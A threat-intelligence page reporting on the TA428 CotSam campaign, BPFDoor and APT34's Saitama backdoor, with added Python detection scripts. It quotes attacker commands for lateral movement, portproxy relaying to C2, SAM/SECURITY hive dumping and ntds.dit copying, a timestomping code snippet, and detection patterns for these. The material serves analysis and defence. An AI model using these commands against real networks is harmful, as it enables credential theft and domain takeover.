APT

loading..
loading..
loading..

ToddyCat APT targeting high-profile cyberespionage across Europe & Asia

A new APT group, tracked as ToddyCat, has been linked to a series of attacks targeting entities in Europe and Asia since at least December 2020...

25-Jun-2022
7 min read

Related Articles


APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one used in attacks that researchers have linked to TA428. We chose to call the malware CotSam (Backdoor.Win32.CotSam) because of its resemblance to the Cotx backdoor.

The attackers employed two techniques for deploying the malware. In the first, the malware was delivered together with a vulnerable version of Microsoft Word: Microsoft Word 2007 for 32-bit systems and Microsoft Word 2010 for 64-bit systems. Once WINWORD.EXE was launched, a DLL hijacking vulnerability was used to pass control to the malicious library wwlib.dll, which decrypted the file OEMPRINT.CAT from the current directory using a simple XOR operation with the key 0xAA.

![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg)

The decrypted executable is then written directly into the memory of the svchost.exe process using the WriteProcessMemory function.

In the second instance, the attackers took advantage of a DLL hijacking vulnerability in the applaunch.exe program (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It is important to note that other Chinese groups had previously distributed ShadowPad malware using the identical version of applaunch.exe.

The backdoor extracts the proxy server parameters from the registry value `HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer`, then connects to the CnC server and waits for commands.

### LATERAL MOVEMENT

After taking control of the initial system, the attackers attempt to spread the malware to other computers on the corporate network. Their goal at this stage is to gain access to the domain controller and take complete control of the attacked organization's infrastructure. The attackers use the remote shell provided by the backdoor to launch their tools and retrieve the results.

In the course of our investigation, we discovered a number of commands that the attackers entered by hand on infected systems (this is indicated both by the time intervals between commands and by the output not being redirected anywhere other than standard output).

Most of the network scanning was performed with the NBTscan console tool, which was downloaded to victims' machines as a .cab archive named ace.cab and unpacked with the expand system tool:

```
expand.exe ace.cab ace.exe
ace -n 172.22.0.0/16
```

In a few instances we also saw the Ladon hacking framework in use. The framework is made up of a variety of modules with lateral movement functionality, such as:

- Scanning the network and identifying different types of devices.
- Identifying and exploiting vulnerabilities in the devices found.
- Cracking passwords for resources on the network.
- Scanning for password hashes.
- Scanning for passwords in text files.
- Remotely executing arbitrary code.

![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg)

With these tools, the attackers are able to scan the entire network infrastructure and identify the systems most exposed to attack. Additionally, the attackers gathered data about system users and their network connections. They were particularly interested in RDP connections:

```
query user
net user
net group
ipconfig /all
netstat -no
netstat -no | findstr 3389
netstat -ano | findstr 2589
```

### Distribution of Malware

Using the results of network scanning and the user credentials they had already obtained, the attackers spread their infection from one system to the next. They used the net use and xcopy commands to connect to remote systems and install malware on them:

```
net use \\[IP address]\IPC$ "[password]" /u:"[user name]"
xcopy.exe /s \\[IP address]\c$\windows\web\* $windir\Web\ /y /e /i /q
```

In some cases an open-source VBS script called wmic.vbs was used to deliver malware; the attackers downloaded it to remote systems as well:

```
cscript.exe //nologo wmic.vbs /cmd [IP address] [user name] [password] $appdata\ABBYY\Install.exe
```

Although wmic.vbs was originally created as a penetration testing tool, threat actors frequently employ it in real attacks. The script executes commands through WMIC (Windows Management Instrumentation Command-line) under a user account with administrative rights.

In other instances the attackers used Windows Task Scheduler to create a task that launches the malware automatically:

```
schtasks /create /tn CacheTasks /tr "$appdata\ABBYY\FineReader\WINWORD.EXE" /sc minute /mo 50 /ru "" /f
```

Where the attackers gained access to closed networks (networks not directly connected to the internet), they turned intermediate systems (systems reachable from the closed network that were also connected to the internet) into proxy servers. This made it possible for malware running on computers in closed networks to communicate with its CnC servers. Configuring the traffic redirection was a simple process that could be completed with built-in Windows tools:

```
netsh interface portproxy add v4tov4 2589 <IP address> 443
```

### Domain Hijacking

After taking control of the domain controller, the attackers took the whole database of Active Directory user password hashes. To do this, they first used the cmd reg command to save a copy of the system registry hives:

```
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
```

Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. However, ntds.dit is in constant use by the system, which prevents ordinary copying tools from working on it. The attackers circumvented this restriction with a dedicated tool that copies the file via the Windows Volume Shadow Copy Service (VSS).

![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg)

An example of a command launching the utility is shown below:

```
c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit c:\programdata\microsoft\ntds.dit
```

Using the contents of the system registry and the ntds.dit file, the attackers obtained the logins and password hashes of every user in the domain. They then used hash cracking to recover the credentials of most users in the attacked company's domain. Where an attacked organization's IT infrastructure included multiple domains, the attackers examined the trust relationships between the domains to locate accounts that would allow them to move laterally:

```
nltest /domain_trusts
```

By gaining access to a domain controller, the attackers obtained, among other things, the password hash of the krbtgt user (an Active Directory service account), which allowed them to carry out the Golden Ticket attack. This permitted them to issue Kerberos tickets (TGTs) themselves for an unlimited period of time and authenticate to any Active Directory service. In one of the cases, the security team of the attacked company noticed unusual activity on the domain controller and changed the passwords of the users whose accounts had been compromised. The attackers nonetheless continued to use Kerberos tickets to act on behalf of these accounts without any difficulty. This demonstrates that traditional incident response measures are ineffective in the event of a Golden Ticket attack.

Last but not least, it is important to note that in one of the incidents the attackers also succeeded in gaining access to the server hosting the management system for security solutions and remotely changed the settings of the endpoint security products the company was using.

Our findings from this [threat research](https://www.secureblink.com/threat-research) demonstrate that spear phishing remains one of the most significant risks to commercial companies and government institutions. Most of the malware employed by the attackers consisted of known backdoors, used together with common lateral movement strategies and antivirus evasion techniques. The attackers were able to access dozens of businesses simultaneously and even take over the complete IT infrastructure and IT security solutions of some of the targeted firms. The series of attacks we have identified is not the first in this campaign, and given the attackers' level of success, we think it is quite probable that they will carry out further attacks along these lines in the future. Public and private organizations should implement comprehensive measures to deter such attacks.

09-Aug-2022
1 min read
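A detection-side companion to the lateral movement, malware distribution and domain hijacking sections of the TA428 article above: it matches logged process command lines against the exact commands quoted there (expand/NBTscan, netstat port checks, net use and xcopy, wmic.vbs, schtasks, netsh portproxy, reg save, ntds.dit, nltest). This is example code written for this page, not the article's own tooling; the log record format and the sample telemetry are constructed.

```python
"""Flag logged command lines that match the lateral movement, distribution and
domain hijacking commands quoted above. Example code, not the article's tooling;
assumes the command line is logged verbatim (Sysmon event 1 / Windows 4688)."""
import re

RULES = [  # (label from the article's section, pattern)
    ("lateral movement: NBTscan unpacked", re.compile(r"\bexpand(\.exe)?\s+ace\.cab\b", re.I)),
    ("lateral movement: NBTscan sweep", re.compile(r"\bace(\.exe)?\s+-n\s+\d+\.\d+\.\d+\.\d+/\d+", re.I)),
    ("lateral movement: RDP/proxy port check", re.compile(r"\bnetstat\b.*\|\s*findstr\s+(3389|2589)\b", re.I)),
    ("distribution: admin share mount", re.compile(r"\bnet\s+use\s+\\\\\S+\\(IPC|C)\$", re.I)),
    ("distribution: xcopy from admin share", re.compile(r"\bxcopy(\.exe)?\b.*\\\\\S+\\c\$\\", re.I)),
    ("distribution: wmic.vbs remote exec", re.compile(r"\bcscript(\.exe)?\b.*\bwmic\.vbs\s+/cmd\b", re.I)),
    ("distribution: WINWORD scheduled task", re.compile(r"\bschtasks\b.*/create\b.*\\WINWORD\.EXE", re.I)),
    ("distribution: portproxy relay", re.compile(r"\bnetsh\s+interface\s+portproxy\s+add\b", re.I)),
    ("domain hijacking: hive dump", re.compile(r"\breg\s+save\s+HKLM\\(SAM|SECURITY)\b", re.I)),
    ("domain hijacking: ntds.dit copy", re.compile(r"\bntds\.dit\b", re.I)),
    ("domain hijacking: trust enumeration", re.compile(r"\bnltest\b.*/domain_trusts", re.I)),
]

def classify(cmd):
    """Labels of every rule the command line matches (empty if nothing matched)."""
    return [label for label, rx in RULES if rx.search(cmd)]

def scan(lines):
    """Records are 'timestamp|host|user|command'; the command comes last so a
    '|' inside it (netstat | findstr) survives the split. Returns (host, label, cmd)."""
    hits = []
    for line in lines:
        if line.count("|") < 3:
            continue  # blank or malformed record
        _ts, host, _user, cmd = line.rstrip("\n").split("|", 3)
        hits += [(host, label, cmd) for label in classify(cmd)]
    return hits

def hosts_with_domain_hijacking(hits):
    """Hosts showing hive/ntds.dit/trust activity: the likely domain controllers to triage first."""
    return sorted({host for host, label, _ in hits if label.startswith("domain hijacking")})

# Constructed sample telemetry (not real): a workstation running the scanning and
# delivery chain, then a domain controller being dumped.
SAMPLE_LOG = """\
2022-08-01T09:58:10Z|WS-017|corp\\jdoe|ipconfig /all
2022-08-01T10:00:03Z|WS-017|corp\\jdoe|expand.exe ace.cab ace.exe
2022-08-01T10:00:09Z|WS-017|corp\\jdoe|ace -n 172.22.0.0/16
2022-08-01T10:03:41Z|WS-017|corp\\jdoe|netstat -no | findstr 3389
2022-08-01T10:10:22Z|WS-017|corp\\jdoe|net use \\\\172.22.4.15\\IPC$ "[password]" /u:"corp\\svc_backup"
2022-08-01T10:10:30Z|WS-017|corp\\jdoe|xcopy.exe /s \\\\172.22.4.15\\c$\\windows\\web\\* C:\\Windows\\Web\\ /y /e /i /q
2022-08-01T10:15:00Z|WS-017|corp\\jdoe|schtasks /create /tn CacheTasks /tr "C:\\Users\\jdoe\\AppData\\Roaming\\ABBYY\\FineReader\\WINWORD.EXE" /sc minute /mo 50 /ru "" /f
2022-08-02T02:12:05Z|DC-01|corp\\svc_backup|reg save HKLM\\SAM sam.save
2022-08-02T02:12:09Z|DC-01|corp\\svc_backup|reg save HKLM\\SECURITY security.save
2022-08-02T02:13:50Z|DC-01|corp\\svc_backup|c:\\programdata\\microsoft\\sc64.exe c:\\windows\\ntds\\ntds.dit c:\\programdata\\microsoft\\ntds.dit
2022-08-02T02:20:00Z|DC-01|corp\\svc_backup|nltest /domain_trusts
"""

if __name__ == "__main__":
    for host, label, cmd in scan(SAMPLE_LOG.splitlines()):
        print(f"{host:6} {label:40} {cmd}")
```

The ipconfig line is deliberately left unmatched: enumeration commands like `ipconfig /all` or `net user` are too common on their own, and it is the sequence of scanning, share mounting and hive dumping on a few hosts in a short window that warrants investigation.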

Malware

Backdoor

Linux

BPFDoor is a Linux/Unix backdoor that allows threat actors to remotely connect t...

BPFDoor, a Linux-based backdoor that surfaced in an evasive mode, has been stealthily targeting Linux and Solaris systems for more than five years. It enables threat actors to remotely connect to a Linux shell and obtain complete access to compromised devices without opening any new network ports or adding firewall rules. Kevin Beaumont uncovered this Linux-specific backdoor, which is linked to the Chinese Red Menshen threat actors, although its source code was posted [anonymously](https://pastebin.com/kmmJuuQP). In his [blog](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896), he discloses in detail that this backdoor has been operational worldwide for many years, with perhaps tens of thousands of cases. Because the malware does not require any open ports, it cannot be stopped by firewalls. It can respond to commands from any IP address on the web, making it an ideal tool for corporate cyberespionage and persistent attacks.

## Compatibility

The BPFDoor source is concise, targeted and well written. While the sample we reviewed was Linux-specific, it could easily be ported to other platforms with a few minor modifications (a Solaris binary reportedly exists). BPF is generally available across multiple operating systems, and the core shell functionality is expected to work on multiple platforms with minimal change. The dynamically linked binary is small, about 35K on Ubuntu:

```
-rwxr-xr-x 1 root root 34952 May 11 00:03 bpfdoor
```

It would grow to approximately 1 MB if statically linked, but the dynamically linked version would likely work on most modern Linux distributions. Cross-compilation for several CPUs is also possible, so the implant is expected to be compatible with embedded Linux systems.

## Persistence

The implant itself lacks persistence mechanisms because it is highly specialized for a specific function. Persistence must be established by the attacker in some other way, such as rc or init scripts or crontab-scheduled jobs. The initial report mentioned above notes the discovery of persistence scripts. On Linux, the implant uses /dev/shm. This is a ramdisk, and its contents are erased with each reboot. To survive reboots, the implant must reside elsewhere on the host or be reinserted remotely. When incident response teams discover this implant in operation, they should assume that the actual malware is located somewhere on the file system. Assess all system boot scripts for unusual references to binaries or paths.

## Timestomping

The binary clones itself to /dev/shm/kdmtmpflush, which exists only in RAM and is wiped with each reboot. A distinctive trait of the implant is that it sets a fake timestamp on the binary (timestomping) before deleting it:

```c
struct timeval tv[2];          /* tv[0] = access time, tv[1] = modification time */
tv[0].tv_sec = 1225394236;     /* fixed value: 2008-10-30 19:17:16 UTC */
tv[0].tv_usec = 0;
tv[1].tv_sec = 1225394236;
tv[1].tv_usec = 0;
utimes(file, tv);
```

## PID Dropper

The implant creates a zero-byte PID file at /var/run/haldrund.pid. The file is removed if the implant exits normally, but it may be left behind after a hard shutdown or crash. If this file is present, the implant will not start, as it is used to indicate that an instance may already be running.

## Binary Deletion

The binary deletes itself after it starts, making recovery more difficult. However, restoring a deleted process binary on Linux is simple once the system is operational (see our article on how to do it). The primary effect of the deletion is to shield the binary from malware scanners that rely on file scanning. If the primary binary is hidden or encrypted on the device for persistence, it would be challenging to locate. On Linux, however, a deleted process binary is highly suspect. Searching for any process whose binary has been deleted highlights it:

```
ls -alR /proc/*/exe 2> /dev/null | grep deleted
```

## Masquerading Tactics

The implant presents itself under one of the following process names:

```
/sbin/udevd -d
/sbin/mingetty /dev/tty7
/usr/sbin/console-kit-daemon --no-daemon
hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event
dbus-daemon --system
hald-runner
pickup -l -t fifo -u
avahi-daemon: chroot helper
/sbin/auditd -n
/usr/lib/systemd/systemd-journald
```

The names are designed to resemble typical Linux system daemons. The implant overwrites the argv[0] value that the Linux /proc filesystem uses to determine the command line and command name displayed for each process. As a result, when you run commands such as ps, the fictitious name is displayed. The process running under the alias `dbus-daemon --system` is shown below.

![Bpfdoor ps listing.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Bpfdoor_ps_listing_f8aab890fd.jpg)

This masquerade tactic has existed for some time. While it works, the true process name is still visible within Sandfly alongside the masked version. A discrepancy of this kind between the actual process name and the command line values is itself an indicator of a problem.

Tristan Pourcelot of the [threat intelligence](https://exatrack.com/public/Tricephalic_Hellkeeper.pdf) and incident response company [Exatrack](https://exatrack.com/) noted in a technical analysis of BPFDoor that the malware has multiple hard-coded names that match command strings within the relevant packets:

- Justtryit, Justrobot and Justforfun establish a bind shell on ports 42391 through 42491.
- Socket or socket TCP establishes a reverse shell to an IP address in the packet.

BPFDoor's strategies for evading detection include renaming the binary so that it appears to be a typical Linux daemon.

## Bindshell Backdoor Bypassing Firewall

The malware employs a Berkeley Packet Filter (the BPF in the backdoor's name) sniffer that operates at the network layer interface, allowing it to monitor all network activity and transmit packets to any destination. Because it sits at such a low level, BPF is not subject to firewall rules. The malware is available for Linux and Solaris SPARC platforms and could also be adapted to BSD. In addition, the operators use a "magic" password to control the actions of the implant. BPFDoor parses only ICMP, UDP and TCP packets, examining them for a particular data value and, for UDP and TCP packets, a password. BPFDoor is distinctive in that it can monitor any port for the magic packet, even ports used by legitimate services such as web servers, FTP or SSH. If a TCP or UDP packet contains the correct "magic" data and a valid password, the backdoor activates and executes a supported command, such as establishing a bind or reverse shell.

![Firewall redirect diagram.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Firewall_redirect_diagram_8fd755fffb.jpg)

Researchers identified BPFDoor activity on the networks of organizations in several regions, including the United States, South Korea, Hong Kong, Turkey, India, Vietnam and Myanmar. Surprisingly, eleven Speedtest servers were infected with BPFDoor. According to the researcher, it is unknown how these devices were compromised, given that they run closed-source software.

## Conclusion

Leveraging techniques such as environment anti-forensics, timestomping and process masquerading, this implant is well executed. The combination of BPF and packet capture allows remote attackers to control the implant while circumventing local firewalls. Lastly, the redirect capability is unique and extremely hazardous because it can blend malicious and legitimate traffic on an infected host with exposed ports. The code does not reveal much about its authors, but it was clearly written by an expert with detection evasion in mind.

31-May-2022
1 min read
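The BPFDoor traits above (deleted process binary, argv[0] masquerading, the haldrund.pid marker, the /dev/shm copy and the fixed timestomp value) can be checked from /proc and the file system. The script below is example code written for this page, not Sandfly's or the article's tooling; the masquerade check compares the first token of argv[0] with the kernel's comm name, and the sample values in the test are constructed.

```python
"""Host checks for the BPFDoor traits described above: a process running from a
deleted binary, an argv[0] that does not match the kernel's comm name (ps
masquerading), the /var/run/haldrund.pid marker, the /dev/shm copy, and the
hard-coded timestomp value 1225394236. Example code, not Sandfly's tooling."""
import os

TIMESTOMP_EPOCH = 1225394236   # the value written by the implant's utimes() call
PID_MARKER = "/var/run/haldrund.pid"
SHM_COPY = "/dev/shm/kdmtmpflush"

def check_process(pid, exe_target, cmdline, comm):
    """Evaluate one process from the values read out of /proc/<pid>/:
    exe_target = readlink(exe), cmdline = NUL-separated argv, comm = comm file."""
    findings = []
    if exe_target.endswith(" (deleted)"):
        findings.append(f"pid {pid}: running from deleted binary {exe_target}")
    argv0 = cmdline.split("\0", 1)[0]
    if argv0:
        # comm is derived from the executed file name (15 chars max) and is not
        # rewritten when a process overwrites its own argv; normalise the
        # legitimate variants ('-bash' login shells, 'sshd: user' style titles).
        shown = os.path.basename(argv0.split(" ", 1)[0]).lstrip("-").rstrip(":")[:15]
        if shown != comm:
            findings.append(f"pid {pid}: argv[0] {argv0!r} masquerades comm {comm!r}")
    return findings

def check_mtime(path, mtime):
    """Flag a file whose modification time equals the implant's fixed timestamp."""
    if int(mtime) == TIMESTOMP_EPOCH:
        return f"{path}: mtime is the BPFDoor timestomp value {TIMESTOMP_EPOCH}"
    return None

def scan_host(proc="/proc"):
    """Walk the live /proc and the file-system markers; returns findings (empty when clean)."""
    findings = []
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
            with open(f"{proc}/{pid}/cmdline", "rb") as f:
                cmdline = f.read().decode(errors="replace")
            with open(f"{proc}/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:          # kernel threads, exited pids, insufficient privilege
            continue
        findings += check_process(int(pid), exe, cmdline, comm)
    for path in (PID_MARKER, SHM_COPY):
        if os.path.exists(path):
            findings.append(f"{path} present")
            hit = check_mtime(path, os.stat(path).st_mtime)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for line in scan_host():
        print(line)
```

An argv[0]/comm mismatch on its own needs triage (some services retitle themselves legitimately); combined with a deleted binary, a /dev/shm path or the 2008 timestamp it is a strong signal.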

Phishing

Backdoor

FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat act...

A new stealthy backdoor known as Saitama has been discovered in a spear-phishing attempt targeting Jordan's foreign ministry. Researchers at Malwarebytes and Fortinet FortiGuard Labs connected the attack to an Iranian cyber espionage threat actor known as APT34, citing similarities to previous campaigns launched by the group. The email, like many such attacks, contained a malicious attachment, according to Fortinet researcher Fred Gutierrez. "The associated danger, however, was not your typical virus. Instead, it possessed advanced persistent threat (APT) capabilities and methodologies."

APT34, also known as OilRig, Helix Kitten and Cobalt Gypsy, has been active in the Middle East and North Africa (MENA) since at least 2014 and has a history of targeting the telecom, government, defense, oil and banking sectors with targeted phishing attacks. This February, ESET linked the group to a long-running information gathering operation targeting diplomatic institutions, technology corporations and medical organizations in Israel, Tunisia and the United Arab Emirates.

## Saitama Backdoor

The newly discovered phishing email includes a weaponized Microsoft Excel sheet which, when opened, urges the potential victim to enable macros, allowing a malicious Visual Basic for Applications (VBA) macro to drop the malware payload ("update.exe"). In addition, the macro provides the implant with persistence by creating a scheduled task that runs every four hours. Saitama is .NET-based malware that uses the DNS protocol to conceal its command-and-control (C2) communications and executes commands received from the C2 server using a "finite-state machine" technique. "This suggests this virus is getting tasks from a DNS response," Gutierrez stated. DNS tunneling, as the name implies, allows data from other programs or protocols to be encoded in DNS queries and responses. The command execution results are then transmitted back to the C2 server, with the exfiltrated data embedded in a DNS request.

"Given the amount of effort put into constructing this virus, it does not appear to be the sort to execute once and then destroy itself," Gutierrez added. "This virus does not build any persistence mechanisms, maybe to avoid triggering any behavioral detections. Instead, a scheduled process is used to generate persistence using an Excel macro."

13-May-2022
1 min read
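The DNS tunneling the Saitama write-up describes (tasks delivered in DNS responses, results exfiltrated inside query names) leaves a measurable trace in resolver logs: one base domain receives many unique, long, high-entropy subdomains from a host. The heuristic below is example code written for this page, not Fortinet's or Malwarebytes' analysis tooling; the log format, the thresholds and the sample traffic are constructed assumptions.

```python
"""Heuristic detector for DNS-tunnelled C2 as described above: results leave in
query names, so one base domain collects many unique, long, high-entropy
subdomains. Example code; log format and thresholds are assumptions."""
import hashlib
import math
from collections import defaultdict

def shannon_entropy(s):
    """Bits per character of the string's symbol distribution (0 for empty)."""
    if not s:
        return 0.0
    probs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in probs)

def split_name(qname):
    """Return (subdomain, base); the base is approximated as the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def profile(lines):
    """Aggregate 'timestamp client qname qtype' records per base domain."""
    stats = defaultdict(lambda: {"subs": set(), "ent": [], "len": [], "clients": set()})
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or malformed record
        _ts, client, qname, _qtype = parts[:4]
        sub, base = split_name(qname)
        st = stats[base]
        st["subs"].add(sub)
        st["ent"].append(shannon_entropy(sub.replace(".", "")))
        st["len"].append(len(qname))
        st["clients"].add(client)
    return stats

def suspicious_domains(lines, min_unique=8, min_len=40, min_entropy=3.0):
    """(base, unique subdomains, mean qname length, mean entropy, clients) for
    every base domain that exceeds all three thresholds."""
    flagged = []
    for base, st in profile(lines).items():
        uniq, n = len(st["subs"]), len(st["len"])
        mean_len, mean_ent = sum(st["len"]) / n, sum(st["ent"]) / n
        if uniq >= min_unique and mean_len >= min_len and mean_ent >= min_entropy:
            flagged.append((base, uniq, round(mean_len, 1), round(mean_ent, 2), sorted(st["clients"])))
    return sorted(flagged)

def constructed_log():
    """Constructed resolver log (not real traffic): ordinary lookups plus one host
    pushing hex-encoded chunks as subdomains of example.net."""
    lines = [f"2022-05-10T08:{i:02d}:00Z 10.1.1.{20 + i % 3} www.example.org A" for i in range(6)]
    lines.append("2022-05-10T08:10:00Z 10.1.1.21 mail.example.org MX")
    for i in range(12):
        d = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()  # stand-in for encoded output
        lines.append(f"2022-05-10T09:{i:02d}:00Z 10.1.1.20 {d[:32]}.{d[32:]}.example.net TXT")
    return lines

if __name__ == "__main__":
    for row in suspicious_domains(constructed_log()):
        print(row)
```

CDNs and some security products also generate long, unique subdomains, so treat a hit as a starting point: the clients list tells you which hosts to look at, and the query type mix (TXT in the sample) and response sizes help separate tunnels from benign traffic.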